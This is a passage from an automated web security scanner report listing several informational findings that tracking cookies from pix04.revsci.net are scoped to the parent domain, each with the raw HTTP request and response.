rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzk/cnfwRV+8er9duzVms/EZMc; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:50 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e648a&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:38:50 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/118073152.js HTTP/1.1
Host: pix04.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzkXSkPATW+Mer9duzVms/XJMQ; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d6e5eac&0&&4d4662c3&4c5cffb70704da9ab1f721e8ae18383d;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzk/cnfwRV+8er9duzVms/EZMc; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:50 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e648a&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:38:50 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:38:50 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

11.157. http://pix04.revsci.net/F08747/b3/0/3/1003161/123757995.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/123757995.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LClyETCWI0VkREa9s=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:15 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e64a3&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:15 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/123757995.js HTTP/1.1
Host: pix04.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzkXSkPATW+Mer9duzVms/XJMQ; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d6e5eac&0&&4d4662c3&4c5cffb70704da9ab1f721e8ae18383d;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LClyETCWI0VkREa9s=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:39:15 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e64a3&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:39:15 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 15:39:14 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

11.158. http://pix04.revsci.net/F08747/b3/0/3/1003161/128688612.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/128688612.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVIxEbUkvQSU+Mer9duzVms+/pMu; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:21 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98b1&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:21 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/128688612.js HTTP/1.1
Host: pix04.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzkXakvIXV+cer9duzVms/DJMc; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d6e5eee&0&&4d465115&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d6e5ec7&0&&4d4646af&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d6e5eac&0&&4d4662c3&4c5cffb70704da9ab1f721e8ae18383d;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVIxEbUkvQSU+Mer9duzVms+/pMu; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 19:21:21 GMT; Path=/
Set-Cookie: NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e98b1&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 19:21:21 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 703
Date: Wed, 02 Feb 2011 19:21:21 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['F08747_10107','F08747_10095'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[\w\-]+\.[a-zA-Z
...[SNIP]...

11.159. http://pix04.revsci.net/F08747/b3/0/3/1003161/128688612.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/128688612.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzkXQnvsTX+8er9duzVms/8JMd; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:24:32 GMT; Path=/
rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJaeL+0OcrqWduR+Mlrw==; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:24:32 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/128688612.js?D=DM_LOC%3Dabout%253Ablank%253F_rsiL%253D0%26DM_EOM%3D1&C=F08747 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: pix04.revsci.net
Cookie: NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=; NETSEGS_F08747=12bcf06b3b0e70c4&F08747&0&4d6e5e81&0&&4d4637e7&bf058458ea0db79cf343e4719eee87c6; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDwa7MC90GTCMM0VkS2a+I=; rtc_0=MLuBM44HAVzDEFZDcsKR1+BMtq9Qy3TJceL+0OcrqWduR/0lqQ==

Response

11.160. http://pix04.revsci.net/F08747/b3/0/3/1003161/129048156.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/F08747/b3/0/3/1003161/129048156.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mh2y3J7gB1NTNwT8g7lTtVTtlUQIhMYnpSDw65LCV2CTCeM1VkRza8Y=; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:38:41 GMT; Path=/
NETSEGS_G07610=12bcf06b3b0e70c4&G07610&0&4d6e6481&0&&4d464cb2&bf058458ea0db79cf343e4719eee87c6; Domain=.revsci.net; Expires=Wed, 02-Mar-2011 15:38:41 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /F08747/b3/0/3/1003161/129048156.js HTTP/1.1
Host: pix04.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: udm_0=MLvv7qPvYS5npS5IdtJQSpvhPw1xdhVUjBbpU3lJNuJJjrMFZ2Nq9VW0Wyy3ISZ5NO+MmP9FlSyoQw8mvWSHpPLJ1ngG9DATUx02q3F9jFyZqD077+Us3IKBcnnEE5XwdejqXpJAZPwNSFXg0uCWwyYQdlxZpijKrbF7cCvCoMYDTktERxIxSZZcDt8MjuJZ+W4TPaIPrq7nNd0flh2LluQS43FREiqbZBDbJe3Y/jSE1FU4KxKFeyAHidFnlHTh8CY7/9O6tRnqrJq22sxU/yTe6grWk5jenBAXIYJ1bUF4lqEcdlwQaNi98F38q8o9V3L0pMaQODi+TW0+bz3ALn1b+T7f3V7o0K7wUXxvw1OcUQqqv8/a0p6ptjD0Lu0PpxvLzjJ9VEsQsXgttwYzWyq1u6gQ3s8OnOTraQkO26fOHecRUPM7YxFYfZ8Qz+d3/Czf6/YytLwZhcMx4RHxCiqH+YQd+1ZVZtz4VgrCVFWWM4cD0Tpp1KPgYL7P3px5TrVyAQj0piQ2GkHnf+7p4LZvwlW4wnyepfzPy9HPhpNamRaQebRgo4I=; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TUl0fhIBEwoAAAIMqhQAAAAr; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgq4lBtLUIX15E3bLwvfkI4mqnxmVeJWtwf0wDT7Fu8GN7lxE/BcVKzkXSkPATW+Mer9duzVms/XJMQ; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; 